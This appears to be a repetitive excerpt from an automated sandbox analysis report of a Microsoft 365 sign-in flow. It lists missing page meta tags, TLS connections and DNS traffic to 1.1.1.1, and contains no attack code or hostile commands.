Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdEHTTP Parser: No <meta name="author".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdEHTTP Parser: No <meta name="author".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdEHTTP Parser: No <meta name="author".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdEHTTP Parser: No <meta name="author".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdEHTTP Parser: No <meta name="author".. found
Source: https://www.office.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.office.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.office.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.office.com/HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No <meta name="copyright".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No <meta name="copyright".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No <meta name="copyright".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No <meta name="copyright".. found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49860 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49911 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
